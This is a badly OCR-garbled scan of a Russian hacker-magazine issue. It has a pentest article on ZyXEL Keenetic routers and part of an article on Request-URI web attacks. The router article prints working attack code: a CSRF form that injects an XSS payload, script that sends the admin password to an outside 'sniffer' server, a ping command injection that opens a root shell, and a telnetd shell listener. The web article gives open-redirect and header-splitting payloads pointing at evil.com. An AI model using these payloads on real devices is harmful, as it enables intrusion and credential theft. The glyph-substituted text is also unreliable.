И наконец, Тапдегіпе позволяет проводить динамический 
анализ кода. Это достигается двумя способами. Ты можешь 
легировать весь стек вызовов, с именами функций, параметров 
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Данное исследование 
впервые было представ- 
лено наВІаскНаІАЬи 
ОІіаЬі2012. 

ѴѴіпРоѵѵз Рбопе- срав- 
нительно новая мо- 
бильная операционная 
система от МісгозоЙ, ко- 
торая позиционируется 
как сдвиг относительно 
старой ѴѴіпсІоѵѵз МоЬіІе. 



и их значениями. Также ты можешь исполнять свой собствен- 
ный код. Все эти вещи настраиваются, ты можешь указать, ка- 
кие конкретно методы надо анализировать. 

Теперь посмотрим, как работает Тапдегіпе. Во-первых, ди- 
намический анализ осуществляется при помощи инструмен- 
тации СП-кода. Во-вторых, логирование работает при помощи 
консоли эмулятора. С ее помощью можно увидеть всю инфор- 
мацию, которую приложение выводит в консоль. 

Итак, у тебя есть приложение, которое ты хочешь проанали- 
зировать. Ты открываешь его в тулзе, добавляешь хуки на инте- 
ресующие методы: логирование вызовов, выполнение нужного 
кода и так далее. Затем Тапдегіпе переподписывает проинстру- 
ментированные сборки, упаковывает в новый ХАР-файл и раз- 
ворачивает на эмуляторе или девайсе. Затем ты работаешь 
с приложением и видишь вывод вызовов методов и как прило- 
жение работает с учетом добавленного в него кода. 

Конечно, у Тапдегіпе есть ограничения. Некоторые из них 
были сделаны намеренно (например, Тапдегіпе не работает 
с системными библиотеками). Некоторые ограничения могут 
быть преодолены в дальнейшем, а некоторые нет. В частности, 
невозможно анализировать ѴѴіпсІоѵѵз Ріюпе 8 приложения, взя- 
тые из магазина или с устройства, поскольку сборки содержат 
МОП или нативный код (в случае телефона). Таким образом, 
если ты захочешь проанализировать ѴѴР8-приложение, ты дол- 
жен будешь взять приложение до того, как оно попало в мага- 
зин. Но это тоже временная проблема, и мы работаем над ее 
разрешением в данный момент. 



ѴѴіпбоѵ/з Ріюпе Зіоге 
(бывший Магкеіріасе) 
насчитывает более 
125000 различных 
приложений: от клиентов 
соцсетей до мобильного 
банкинга. И количество 
приложений постоянно 
увеличивается. 



В К АЧ ЕСТВЕ ЗАКЛ ЮЧ ЕН ИЯ 

Итак, мы достаточно подробно рассмотрели модель безопас- 
ности ѴѴіпсІоѵѵз Ріюпе 7/8, поговорили о приложениях, а также 
о том, как и с помощью чего анализируется безопасность мо- 
бильных приложений. В ѴѴіпсІоѵѵз Ріюпе 8 появились новые век- 
торы атак (арр-Іо-арр взаимодействие, баги в нативном коде), 
однако важно помнить, что большую часть багов составляют 
не специфичные для платформ уязвимости, а «логические» 
баги, присутствующие в любой программе. □□ 





ѴѴР- Ѵ8. Апсігоісі- Ѵ5. і08-уязвимости 



ѴѴР-приложение на устройстве 







Взлом 
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АТАКА 
НА РОУТЕР 



Как ошибки в админке 
маршрутизаторов 
могут выдать полный 
доступ к роутеру 



Производители программного обеспечения 
недостаточно заботятся о безопасности 
маршрутизаторов. А ведь именно через 
роутер злоумышленник может проникнуть 
во внутреннюю сеть и прослушивать весь 
проходящий трафик. В данной статье будут 
рассмотрены баги и уязвимости, которые 
были найдены мной и товарищем @090Ь 
в процессе пентеста завоевавших популяр- 
ность роутеров ІуХЕІ Кеепеііс. 




с ѵЬег-оип!:(о)ха1<ер .. і , 

■■■ . л. 




АМ4 ^АNЗ 1-А№ ^АN1 ѴѴАМ ОСІМ РОѴѴ 



СОВРЕМЕННЫЙ РОУТЕР 

Если не брать тех людей, которые сравнивают установку ѴѴі-Рі- 
роутера с монтированием вышки сотовой связи у себя дома 
и опасаются влияния радиоволн на свой мозг, можно с уве- 
ренностью сказать — беспроводная точка доступа есть почти 
у каждого активного пользователя Сети. Помимо удобства, 
ѴѴі-Рі-роутер, как правило, добавляет и безопасности: устрой- 
ства пользователя оказываются за файрволом и недоступны 
для прямых атак. Но вместе с тем сама точка доступа может 
стать объектом для атаки. Программное обеспечение точки до- 
ступа (как и любого другого девайса) нередко может быть уяз- 
вимо. Производители в большинстве случаев редко придают 
значение серьезным проверкам безопасности, концентрируясь 
на удобстве пользователя и максимальной производительно- 
сти. Аргументация простая: если большинство сервисов недо- 
ступны извне, а админка доступна только для пользователей 
в локальной сети, то чего заморачиваться? На самом же деле 
набор из простых уязвимостей вкупе с социальной инженерией 
может дать злоумышленнику удаленный доступ к управлению 
роутером (правда, при определенном стечении обстоятельств). 
В этой статье мы рассматриваем потенциальную возможность 
такой атаки на роутер ІуХЕі Кеепеііс, с первой версией про- 
шивки, которая установлена по умолчанию. 

ПЕРВЫЙ ВЗГЛЯД 

Надо понимать, что мы целенаправленно искали уязвимо- 
сти в роутере. Не было задачи взломать кого-то, у кого стоит 
нужная нам точка доступа. Первое, с чего мы начали, — это 
сканирование портов Мтар’ом из внутренней сети (снаружи 
веб-админка по умолчанию закрыта). Сканер показал нам три 
открытых порта, из которых нас интересуют только два — 80-й 
(веб-интерфейс) и 23-й (Теіпеі). 

РОКТ 5ТАТЕ 5ЕКѴІСЕ ѴЕР5І0М 
23/1:ср ореп 1:е1пе1:? 

53/1:ср ореп сіотаіп сІпзіпаБЯ 2.55 

I СІП5-П5ІСІ: 

ЬіпсІ. ѵегБІоп: с1п5та5Я-2. 55 
80/1:ср ореп Ііііір СоАИеасІ-ЫеЬБ Іі1:1:рсі 
I Ы;1;р-аи1:Ь: 

1 НТТР/1.0 401 ІІпаиІіІіогігесІ 

На 80-м порту крутится обычный веб-интерфейс для управ- 
ления роутером. С него мы и начнем. 

ВЕБ-БАГИ 

Если рассмотреть веб-интерфейс с точки зрения безопасности, 
то это провал. Классика жанра: везде, где есть возможность 
ввода своей информации, отсутствует фильтрация! В формах 
отсутствуют какие-либо токены, что открывает возможность 
для СЗВР-атак. 

Конкретно каждую Х55 я рассматривать не буду, но стоит 
обратить внимание на один интересный вариант эксплуата- 
ции Х88 (лайфхак). Тебе наверняка хотелось бы скрыть себя 
из списка клиентов, подключенных к роутеру (их можно посмо- 
треть в админке роутера). Казалось бы, для этого нужно иметь 
доступ к консоли, писать модули ядра и так далее. Но ответ 
лежит на поверхности. Просто меняем имя нашего компью- 
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1:=1.гер1асе(/'^(.*\п)*.*<Ы:т1/і, 
^=1:.гер1асе(/<\/Ы:т1>(.*\пХ*...*$/і, "</Ы:т1>"); 
ѵаг рагзег =..пеілі. 00МРаг5еп(); 
уаг сіот = раг5ег.раг5еРгот51:піп§(1:^ 'Чех^УхтІ"); 
ра55могс1 = сІопі.ее1:Е1етеп1:5ВуТаеМате( 'іприі:' )[ 10 ] 
ѵаіие //а..ті. .і 4 пароль . 

//.посылаем .на,_.сниф^^ 

уаг ітт = сІоситеп1:.сгеа1:еЕІетеп1:( ' іт§' ) ; 
ітт.5е1:А1:1:гіЬи1:е( ’5гс^ *'ЬПр://5егѵег/5пі-Рег?"+«-^ 

ра55\л/ОГСІ) 

Стоит обратить внимание на то, что, скачав с роутера файл 
И«р://192.168.1.1/гед/сопЯд/КЕЕМЕТІС.сТд на наш удален- 
ный сервер и выполнив команду «саі КЕЕМЕТІС.сТд | діір 
-0», мы получим значение всех системных переменных, в 
том числе и ѴѴі-Рі-ключ от роутера и от админки роутера. 

4. После успешной передачи данных на сниффер выполняем 
А^АX, который отправит запрос на очистку таблицы (тем са- 
мым мы стираем нашу Х85). 



тера на 1’}]");а1еП(1): и подключаемся к роутеру. В результа- Прошивка 

те можно увидеть, что мы «втиснулись» в иЗ таким образом, подскальпелем 

что он не обработался и выдал пустой список клиентов. Этого 
будет вполне достаточно, чтобы скрыть себя и других пользо- 
вателей, подключенных к точке доступа, от глаз невниматель- 
ного админа. 



Благодаря С8РР и Х83 можно добыть пароль от роутера 
и получить удаленный доступ через бэкенд, что будет самым 
лакомым подарком. Однако для этого не обойтись без соци- 
альной инженерии (вообще любая атака становится возможной 
только при определенном стечении обстоятельств). 

1 . Отправляем админу ссылку на хост с заранее подготовлен- 
ным НТМЕ-файлом: 



<Р0КМ NАМЕ="Ьиу" асІ:іоп="И^1:р;//192.168.1Л/гед/«-^ 
и5ег5Асіс;і " МЕТН00= \\Р05Т " > 

<іпри1: ■1:уре="Ыс1с1еп’' паше= ' изег^пате ’ ѵа1ие=*-' 
•<5сгірі: 5гс=•7/5егѵег/^5/1.^5" гуре="1ех1:/е 
Заѵа$сгір-С">'> 

<іпри-1; 1:уре="ЬісІсІеп" пате= ' раззмогсі ‘ ѵа1ие="3"> 
<іпри1: 1;уре="ІіісІс1еп" пате= ЧиІІАссезз ' ѵа1ие="0"> 
<,іприі; і:уре=’Ъіс1с1еп'’ пате=*$аѵе' ѵа1ие="%00%943^ 
О0%ВЕ%Р0%В1%О0%В0%О0%В2%О0%В8%О1%82%Р1%8С"> 

<іпри1; 1:уре="Іііс1сІеп" пате='5иЬті1:_иг1’ ѵа1ие=«-« 
"%2Р5егѵег%2Ри$ег5,а$р"> 

<УР0КМ> 

<5сгір1;>сІоситеп1: . Ьиу . зиЬтіІіО ; зеІіТітеоиІ; ( * сіоситепі: . 
Іосаііоп = "Ы:1:р://192.168.1.1/5егѵег/и5ег5. 
азр" ' ,3000)</зсгір1:> 

Как видишь, используется автосабмит и типичная С8РР. 
В одном из полей — изег_пате — с помощью <8сгір1> встав- 
ляется наш ^8-пейлоад. 

2. Пользователь переадресовывается на протрояненную 
скриптом страницу роутера, и Х88-код исполняется у него 
в браузере. Правда, есть один важный нюанс. В админке ис- 
пользуется Вазіс ассезз аиШепІісаІіоп, поэтому атака срабо- 
тает, только если у жертвы открыта админка или же логин- 
пароль был сохранен в браузере. 

3. С помощью пейлоада выполняем необходимые нам дей- 
ствия. В примере, приложенном к статье, мы просто вы- 
дергиваем из веб-интерфейса пароль от роутера и присы- 
лаем на наш сниффер. Пейлоад для этой задачи довольно 
простой: 




ѵѵшѵѵ 

Обсуждение 
маршрутизаторов 
2уХЕ1 Кеепеііс: 
(огит.іѵ.хто : о 

Интересная ветка 
форума на іхЫ; 
Ьіі.Іѵ/12ЕІІЗ(з 



УЖ хт1ІтІ:1:р = §е1:Хт1Н1:1:р() 

хтІЫІір . ореп ( ' СЕТ ' ^ ' /ЬотепеТУмігеІезз/зесигіІіу . азр ' , «-• 



хт1Ьі:1;р.5епсІ(пи11); 

ІТСхтІИТТр.зІіаТиз == 200) { 

Т = хтИгС-Ьр. гезропзеТехТ; 

} 



Возможности роутера 
Кеепеііс на прошивке 
второго поколения: 
ІіаЬгаЬаЬг.ги/ 
0081/135557 

Дополнительные 
приложения для 
Кеепеііс: ЬЛ.1у/УЗоб4Т . 



/Усіеаг 

ѵаг хшІЫіТр = ^еТХт1Н1:1:р() 

хтІітр.орепС 'Р0$Т', '/гед/изегзОеІ ' ^ і.а.І 5 „е); 
хшІЫіІір . зепа ( " зе1ес1:0=ОЫ8зе1есі:і=ОЫ&ае1А11=%О0%АЗ- 
%О0%В4%О0%В0%О0%ВВ%О0%В8%О1%82%О1%8С+%О0%В2%О1%81-' 
%О0%В5&зиЬтіі:^иг1=%2Р5егѵег%2Ри5ег$ , азр%ЗРи5ег_«-' 
пате%ЗОС58Р%05%0Араз5ѵ/ога%ЗРС5КР%0О%0АТи11Ассе53^ 
%ЗР0%0О%0Азаѵе%ЗО%О0%94%О0%ВЕ%О0%В1%О0%В0%О0%В2%^ 
Р0%В8%Р1%82%Р1%8С%0О%0АзиЬті1:_иг1%ЗР%2Рзегѵег%2-' 
Ризег5.азр")і 

5. Бинго! Роутер наш! 

Конечно, это скорее ргооі-оі-сопсері. Это не значит, 
что можно взломать любой из полумиллиона девайсов Кеепеііс, 
которые были проданы. Атака возможна при стечении двух 
обстоятельств. Админ должен открыть ссылку — это первое. 
И веб-интерфейс роутера должен быть открыт в браузере, или 
же логин-пароль должны быть сохранены в браузере. Однако 
ргоо1-о1-сопсер1 работает! 

^АI^ВНЕАКРНОМСМ^ 

Подключившись по телнету и залогинившись с данными, кото- 
рые мы извлекли из файла КЕЕМЕТІС.сІд, попадаем в интер- 
активную консоль Кеепеііс. Здесь мы можем выполнять при- 
митивные операции или даже системные команды через ехес. 
Пример: 

РаззшгсІ : 

КЕЕМЕТІС 40 зуз аИзН 

Е/ІЛІ ѵегзіоп : VI. 00(ААВѴ. 1.2)00 

Ргоаисі: Моаеі : КЕЕNЕТIС 4С_КеѵВ 

КЕЕNЕТIС 4С> міап зііаііиз 
Нагсімаге асісігезз: СС:5О:4Е:РЕ:А1:00 



Настройка беспроводной сети \Л/і-Рі 

Подтвердите рекомендуемые программой параметры или задайте собственные 

Режим беспроводной сети: 

Безопасная сеть с максимальной защитой 0А/РА2) 

Имя сети (5$Ю): 

2уХЕ1Ав27 

ключ: 

2ѴХЕ1628-МЕС 

V Сохранить настройки а текстовый файл 

^С:\^іе^4\090^\0е4к^ор\\А/Iте^е4С^АNСооп8и^аI1оп.^xТ Выбрать файл 



в 



Отмена 



Далее 



Клиент НеІРгіепсі 
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СКОРЫЙ висріх 

Парии из ХуХЕЬ сразу же ответили, что будут делать с багами 

«Исправления найденных багов (там где, это необходимо) в ближайілее 
время станут доступны пользователям в той или иной форме в зависимости 
от версии микропрограммы (VI — в неофициальных сборках, Ѵ2 — в све- 
жих компонентах). Прошивка 2.0 вообще построена по иному принципу — 
без использования збеІІ и ВизуВох. Вся логика работы скрыта в модулях 
и библиотеках, и повлиять на ее работу гораздо сложнее Получить руто- 
вый доступ попросту некуда. Командная оболочка МОМ хоть и исполняется 
от имени рута, но настолько ограничена, что требуется отдельное иссле- 
дование, как использовать ее по злому умыслу. Что касается уязвимостей 
веб -интерфейса, вставить код на страницу через имя компьютера в про- 
шивке 2.0 невозможно (мы на всякий случай проверили). Воспользоваться 
С5НР не получится, ведь мы используем АиАХ, а не СЕТ/Р08Т через форму 
или иВІ, а кросс-доменные запросы А^АX давно блокируются браузерами. 
Украсть пароль тоже нельзя, потому что он не хранится в открытом виде.» 



Изменяем имя сети на Х88, и она исполняется 




Ыігеіезз : Оп 

Мосіе: Ассезз Роіпі: 

5510 : 2уХЕІ_КЕЕМЕТІС_4С_РЕА100 
СИаппеІ: 10 
Рго1:осо1: 802.11Ь/б/п 
5есигі1;у: ЫРА2-Р5К ТКІР/АЕ5 
А5СІІ кеу : 14881488 

Но дело в том, что это дико неудобно, да и хотелось бы 
иметь полноценную консоль, а не какую-то кривую обертку. 
Для получения полноценной консоли был найден и проэксплуа- 
тирован интересный баг с неправильным парсингом аргумента 
для ріпд. Благодаря ему удается выполнять произвольные ко- 
манды и в том числе «выпрыгнуть» из предложенной оболочки 
в шелл азН: 

КЕЕМЕТІС 4С> зуз ріп§ уа.ги;І5 
ріпе: ЬасІ асісігезз 'уа.ги' 

Ьіп сіеѵ е'Ьс ИЬ ргос зЬіп зуз Ітр изг ѵаг іѵеЬ 

КЕЕNЕТIС 4С> зуз ріп§ уа.ги;азЬ 
ріпе: ЬасІ асісігезз 'уа.ги' 

ВизуВох ѴІ.8.2 (2012-02-21 14:52:32 М5К) ^ 
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И вот мы уже имеем полноценную консоль. Теперь мы мо- 
жем делать все, что угодно, но не стоит забывать, что в роутере 
используется файловая система здиазМз в режиме геаб-опіу. 

Теперь сделаем вещь, которая облегчит нашу работу с кон- 
солью. Конечно же, это бэкконнект. Делается он очень просто: 

~ # 1:е1пе1:сІ -Р -1 /Ьіп/азЬ -р 9090 

Теперь открываем консоль на нашем компьютере: 




ШРО 



Чуть не забыли. 
Не используй 
информацию в 
противозаконных 
целях. 




VVАКNINС 



Внимание! Инфор- 
мация представлена 
исключительно с целью 
ознакомления! Ни авто- 
ры, ни редакция за твои 
действия ответственно- 
сти не несут! 



КОНЦЕПТЫ 

Найденные баги открывают возможности для дальнейшего раз- 
вития атаки. Рассмотрим некоторые концепты. 

1 . Вносим изменения в софт роутера. 

Как я уже сказал ранее, мы имеем дело с файловой системой 
зриазМз, и, чтобы что-либо изменить, нужно сильно постарать- 
ся. Для начала скачиваем оригинал прошивки и распаковываем 
(в интернете можно без труда найти множество инструкций), 
далее изменяем необходимые файлы и «склеиваем» прошивку 
в удобный вид. После этого необходимо обновить микропро- 
грамму в роутере, загрузив файл измененной прошивки. Таким 
образом мы сможем изменять, добавлять и удалять какие-либо 
файлы с прошивки. 

2. Добавляем функционал через модуль ядра. 

Если ты обладаешь навыками программирования модулей 
ядра, то ничто не мешает тебе написать свой модуль ядра, ском- 
пилировать его и подгрузить через Ізтоб. Но, чтобы без обнов- 
ления микропрограммы иметь в распоряжении пространство 
для создания и изменения файлов, мы должны подключить 
внешний носитель и работать непосредственно с ним (однако 
у многих пользователей внешний носитель уже подключен). 

3. Получаем дополнительные данные через команду ЛазЬ. 
Стоит обратить внимание на такой инструмент, как команда 

Яазіт, доступная в консоли роутера. Она может дать нам инте- 
ресные данные (к примеру, пароль для программы МеІРгіепб 
с целью удаленной настройки роутера), которые в дальнейшем 
могут быть использованы против жертвы. Пример: 

КЕЕNЕТIС 40 ЯавЬ §е1: 5иРЕК_МАМЕ 
5^РЕК_NАМЕ="1;0и34" 

КЕЕМЕТІС 40 ЛавИ 5иРЕР_РА55Ы080 
5иРЕК_РА551лІ0К0=" і@^0О93и34з?~34 : з#19 . 56 " 

КЕЕМЕТІС 40 Яавб §е1: А^МIN_NАМЕ 
А^МIN_NАМЕ="а6тіп" 

КЕЕМЕТІС 40 ЛавЬ ^еі: А^МIN_РА55^лI0К^ 

АОМІ М_РА551л10К0= " 1 2 34 " 
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Изменяем ЛозТпате 
на специальный код 
и скрываем всех поль- 
зователей 



ВЕРДИКТ? 

Надо понимать, что случай 2уХЕІ не уникальный — изъянами 
в своем софте могут похвастаться практически все производи- 
тели роутеров. Не самые критические на первый взгляд уязви- 
мости при совмещении с социальной инженерией могут приве- 
сти к довольно печальным последствиям. Но обезопасить себя 
от подобного можно, только если регулярно обновлять прошив- 
ки роутера и изменять все настройки, запрещающие удаленно 
пользоваться роутером. 31 



~ # саТ /ргос/ѵегвіоп 

Ііпих ѵегвіоп 2.6.23.17 (6еѵе1орегв@п6твув1:етв . сот) 
(§сс ѵегвіоп 4.1.2) #9 Тие РеЬ 21 20:21:39 М5К 2012 

Как видишь, мы можем даже сделать бэкконнект на свой 
сервер. В некоторых случаях это может помочь обойти защиту, 
если таковая имеется. 
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\ѴАІШШС 



Внимание! Информация представлена 
исключительно с целью ознакомления! 
Ни авторы, ни редакция за твои дей- 
ствия ответственности не несут! 



При исследовании веб-приложения 
методом «черного ящика» основ- 
ное внимание уделяется СЕТ/РОЗТ- 
параметрам и содержимому пользо- 
вательских кук. Однако небезопасно 
могут обрабатываться и остальные 
части запроса клиента: заголовки, 
путь к скрипту и так далее. 
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ВОПРЕКИ 

Атаки на веб- 
приложения через 
Ке^ие5і-^ЯI 



Рис. 1 . Обход Х88-фильтра ІЕ в результате ошибки обработки заголовка 



РЕКОГНОСЦИРОВКА НА МЕСТНОСТИ 

Рассмотрим, как выглядит ІІРІ в НТТР-запросе. По РРС 2616 
РериевМІРІ может быть представлен следующим образом: 

Ке^ие51:-^КI = ( аЬзоІцІіеШІ | аЬз_ра1:И | аиІИогіІіу 

Мы будем рассматривать вариант с использованием аЬв_ 
раІМ, разобьем его условно на несколько частей. 

аЬ5_ра1:Іі = "/" [ра1:И1 ["/" ра1:Іі_іп-Ро] ♦-> 
рагатз] ["?" ^иегу_51;гіп§] 

Так как атака подразумевает собой передачу произволь- 
ных данных, включая спецсимволы, поподробнее остановимся 
на том, где именно их можно передать в РедиевМІРІ и какие 
плюсы/минусы есть у данных способов. Особое внимание бу- 
дем уделять разности обработки РериезМІРІ (таким как ІІРЬ 
кодирование и приведение пути к нормальному виду) популяр- 
ными на сегодняшний день браузерами, так как от этого очень 
часто зависит возможность реализации атаки на клиентов. 



работки часто обнаруживаются при исследовании отдельных его параметров. В таблице 1 
представлены различия обработки диегу_8Ігіпд. 

Принципиального различия между передачей спецсимволов в названии параметра, 
значении или индексе массива во время тестирования браузеров не было замечено, од- 
нако это очень распространенная ошибка обработки со стороны веб-приложения. Напри- 
мер, часто встречается вариант, когда все переданные клиентом параметры обрабатыва- 
ются отдельно, а затем собираются назад в УРІ и используются для построения ссылок. 
При этом замена спецсимволов НТМЬсущностями производится только в значении па- 
раметров, что позволяет реализовать атаку типа «межсайтовое выполнение сценариев», 
задействовав несколько параметров. Основной минус разделов рагатз и ра1М_іп^о в том, 
что их поддерживают далеко не все веб-серверы, но тем не менее о них не стоит забывать. 
В таблицах 2 и 3 представлены различия их обработки разными браузерами. 

Итак, переходим к самой интересной части, а именно к передаче векторов через путь к 
сценарию. Это наиболее интересный вариант, поскольку: 

1 . Нам необходимо передать произвольные данные, то есть изменить путь, но в то же вре- 
мя сделать это так, чтобы запрос обрабатывал нужный уязвимый сценарий; 

2. Разработчики меньше всего ожидают увидеть векторы атак именно в этой части запроса 
и часто используют путь к сценарию без дополнительных обработок; 

3. Браузеры перед отправкой запроса приводят путь в ВедиезМІРІ к некоторой нормаль- 
ной форме. 



РАЗЛИЧИЯ В ОБРАБОТКЕ ЗАПРОСОВ 
РАЗНЫМИ БРАУЗЕРАМИ 

Оиегу_8Ігіпд — наиболее популярное место передачи векторов 
для эксплуатации уязвимостей веб-приложений. Ошибки об- 



Остановимся на третьем пункте и рассмотрим различия в обработке пути в наших брау- 
зерах. В общем случае нормализация пути включает в себя четыре шага: 

• замена символов \ на/; 

• вырезание повторяющихся символов /; 
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Защитным фильтрам вопреки 



8і 



Оригинальный 

запрос 


?1е8і</>'"\=іе8І 


Таблица 1 . 
Различия 


Іпіегпеі Ехріогег 


?іе8К/>'"\=іе8І 


обработки 


СІіготе 


?{е5І%ЗС/%ЗЕ'%22\=<е5< 


циегу_8{гіпд 


Орега 


?1е5І%ЗС/%ЗЕ'%22\=ІеяІ 




ЗаТагі 


?1езІ%ЗС/%ЗЕ’%22%5С=1е8І 




Рігеіох 


?Іе8І%ЗС/%ЗЕ%27%22\=1еяІ 




Оригинальный 

запрос 


/»е8«;«е8«</>"’\ 


Таблица 2. 
Различия 


Іпіегпеі Ехріогег 


/1е8І:^е8І%ЗС/%ЗЕ’%22/ 


обработки 


СПготе 


Лез<:<ез<%ЗС/%ЗЕ’%22/ 


рагатз 


Орега 


/1е8І:1е8І%ЗС/%ЗЕ*%22/ 




Заіагі 


/1е8І:1е8І%ЗС/%ЗЕ%27%22%5С 




Рігеіох 


/1е8І:1е8І%ЗС/%ЗЕ’%22%5С 




Оригинальный 

запрм 


/*е8Ѵ</>*”\ 


Таблица 3 
Различия 


Іпіегпе! Ехріогег 
СИготе 


/1е8І/%ЗС/%ЗЕ’%22/ 

Ле8І/%ЗС/%ЗЕ'%22/ 


обработки 

раІЬ_іп^о 


Орега 


/1е8І/%ЗС/%ЗЕ’%22/ 




Заіагі 


/1е8І/%ЗС/%ЗЕ%27%22%5С 




РігеТох 


/1е8І/%ЗС/%ЗЕ’%22%5С 





• вырезание раІИ ІгаѵегзаІ конструкций типа ^оісіег/../; 

• вырезание конструкций типа /./. 

Реакцию браузеров на символ \ можно посмотреть в таблице 2 и 3, поскольку браузеры 
обрабатывают рагаппз и раШ_іпІо как часть пути к сценарию. Разница в обработке других 
конструкций представлена в таблице 4. Таким образом, было выявлено сразу несколько 
браузеров с необычным поведением при нормализации пути к сценарию: 

1 . 8а!агі (в том числе и его мобильные версии) не производит нормализацию пути, если 
точки представлены в ІІРЬкодированном формате. 

2. Ріге^ох не вырезает последнюю конструкцию ра!И ІгаѵегзаІ, если на конце нет символа /. 

3. Все браузеры, кроме Орега, не вырезают конструкцию раШ ІгаѵегзаІ, если символ / 
представлен в ІІРІ-кодированном формате (в то же время далеко не все веб-серверы 
корректно обрабатывают данный вариант). 

Проведя точно такие же тесты, но через сценарий перенаправления НТТР-заголовком 
Ьосаііоп, мы обнаружили очень интересную ошибку в браузере Іп^егпеі Ехріогег. Особен- 
ность ІЕ в том, что он передает РедиезМІРІ, полученный в заголовке Еосаііоп, практи- 
чески без каких-либо изменений. То есть, используя сценарий перенаправления, можно 
заставить ІЕ послать в РедиезІ-УРІ любые данные без УРЕ-кодирования (включая управ- 
ляющие символы и символы, необходимые для проведения атак типа «межсайтовое вы- 
полнение сценариев», а также произвольные конструкции ра^Іі ІгаѵегзаІ, необходимые 
для проведения атак через РедиезІ-РаШ). Исключение составляют символы, нарушаю- 
щие структуру стартовой строки НТТР-запроса: \0, \1, \г, \п и пробел. Более подробно об 
обнаруженной ошибке обработки можно прочесть в РТ-2013-04, по ссылке: Ьі!.Іѵ/Ѵ\/иКиІі5 
(на момент написания статьи данная информация еще не была опубликована и ссылка не 
работала. — Прим. ред.). 



В таблице 5 представлены тесты обработки некорректных 
путей с использованием сценария перенаправления. 

Таким образом, мы можем использовать раШ !гаѵегзаІ кон- 
струкции в браузерах ЗаТагі, Іпіегпеі Ехріогег (используя обна- 
руженную ошибку РТ-2013-04) и частично в Рігеіох. 

КЛАССИФИКАЦИЯ АТАК 

Рассмотрим варианты реализации атак на клиенты в случае, 
если ПедиезІ-УПІ попадает в НТТР-ответ. 

Ореп Яесіігесі 

Пример: 

ІосаТіоп: [Редиез1:-Ра1;Іі]/пеіл/ 

Эксплуатация: 

Ы;1:р : //ехатріе . сот//еѵі1 . сош/%2Е%2Е 
Результат: 

Іоса1:іоп: //еѵі1.сот/%2Е%2Е/пем 
Браузеры: 

5а-Рагі^ Ріге-Рох (из-за особенностей обработки 
реализация возможна не всегда) 

Особенность данной атаки в том, что с точки зрения нор- 
мализации пути веб-сервером запросы ^^пр://еxатрIе.сот/ и 
Иир://ехатрІе.сот//еѵіІ.сот/../ одинаковы, но для браузера 
//еѵіі.сот/../ будет восприниматься как ссылка на внешний ре- 
сурс без указания УРЬсхемы. 

Иногда сценарии перенаправления учитывают данную 
особенность и усекают повторяющиеся символы /. Такую 
предобработку можно попытаться обойти, используя особен- 
ности браузеров. В таблице 6 представлены примеры значе- 
ний заголовка Іосаііоп, которые браузеры обрабатывают как 
ссылку на внешний ресурс (под комбинацией [НТ] необходимо 
понимать символ ІіогііопІаИаЬ [0x09], представленный в чи- 
стом виде). 

Интересная особенность: Іпіегпеі Ехріогег и СІіготе игнори- 
руют символ ИогігопІаИаЬ в значении заголовка. 

ІЛ Нес1ге58 АПаск 

Пример: 

<-Рогт ас1:іоп="[Кедие5‘1:-Ра1:Ь]/1обіп"> 

<іпри'1: пате="1о§іп"> 

<іпри1: пате="ра55іл/огсІ"> 

</-Рогт> 

Эксплуатация: 

ШТр : //ехатріе . сот//еѵі1 . сот/%2Е%2Е 
Результат: 

<-Рогт ас1:іоп='Ѵ/еѵі1 . сот/%2Е%2Е/1обіп"> 

<іпри1: пате="1о§іп"> 

<іпри1: пате="ра55\л/огсІ"> 

</-Рогт> 

Браузеры: 

5а■Рагі^ ІпТегпеІ: Ехріогег (используя 
РТ-2013-04)^ Ріге-Рох (из-за особенностей обработки 
реализация возможна не всегда) 



Запрос 


// 

_л 


/*е8і/../ ' 


1 /*е8і/%2Е%2Е/ 1 


[ /«езѴ%2Е%2Е 


/«езѴ%2Е%2Е%2Р 




Запрос 


гесІігес1?г=/1е8К*">1е8І/%252Е%252Е 


ІЕ 


// 


/ 


/ 


/ 


/..%2Р 


ІЕ 


/1е8К’">1е81/%2Е%2Е 


СІіготе 


// 


/ 


/ 


/ 


/..%2Р 


СИготе 


/ 


Орега 


// 


/ 


/ 


/ 


/ 


Орега 


/ 


Заіагі 


// 


/ 


/Іе8І/%2Е%2Е/ 


/1е8Ѵ%2Е%2Е 


/%2Е%2Е%2Р 


Заіагі 


/1е8І%ЗС’%22%ЗЕ1е8І/%2Е%2Е 


Рігеіох 


// 


/ 


/ 


/1е8І/%2Е%2Е 


/%2Е%2Е%2Р 


Рігеіох 


/1е8І%ЗС%27%22%ЗЕ1е8І/%2Е%2Е 



Таблица 4 Разница в обработке некорректных путей 



Таблица 5 Разница обработки некорректных путей через сценарий перенаправления 







Взлом 
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Данный вариант, несмотря на сложность эксплуатации (не- 
обходимы действия пользователя), очень удобен не только для 
перенаправления пользователя, но и для получения значений 
параметров формы или ссылки. Например, получив сессион- 
ный С8РР-токен, можно подделать запрос от клиента непо- 
средственно в первом же ответе на запрос, полученный в ре- 
зультате III Ресігезз атаки. 

НТТР Пс8роп8е ЗрПиіпд 

Пример: 

Іоса1:іоп: ІтЫ:р://ехатр1е.сот[Кеяие5'1:-Ра'1:Іі]/пеѵі/ 



Дополнительные условия: 

икі-декодирование перед попаданием 
в НТТР-заголрврк 



Эксплуатация: 

Ы-Ьр : //ехатріе . сот/%0А5е1:-Срокіе : х=х%0АХ : /%2Е%2Е 

Результат: 

Іоса1:іРп : 1т1:-1:р : //ехатріе . срт/ 

5е1:-Срркіе:х=х 

Х:/пем 



Браузеры: 

5а■рагі^ Іп1:егпе1: Ехріогег (испрльзуя 

РТ-2013-04) ^ Ріге-Ррх (из-за рсрбеннрстей 
обрабртки реализация врзмржна не всегда) 



1 

Іпіегпеі Ехріогег і 


1 1 

СНготе ] 


1 1 

1 Орега 1 


1 Заіагі 1 


1 Ріге^ох 


//ІіозТсот/ 

\/Ріоз!.сот/ 

/\ИозТсот/ 

/[НТ]/МозТсот/ 

\[НТ]\Роз1.сот/ 


//Ііоз^сот/ 

\/Ііоз1.сот/ 

/\Р 03 Тс.от/ 

///ЬовХ.оот/ 

\/\Розі.сот/ 

/уирзТсрт/ 

/[НТ]/НозТсот/ 


//Иозі.сот/ 


//ИозТсот/ ; 


//Иозі.сот/ 

///ІпозТсот/ 



Таблица 6 Примеры значений заголовка ЬосаІІоп 



В примере 2 представлен довольно популярный вариант с попаданием на страницу 
Ре^ие 5 ^Ра^I^ без каких-либо обработок непосредственно из запроса, однако из-за ІІПЬ 
кодирования браузерами символов ", <, > в пути к сценарию эксплуатация данной уязви- 
мости возможна только в Іпіегпеі Ехріогег через обнаруженную ошибку, позволяющую из- 
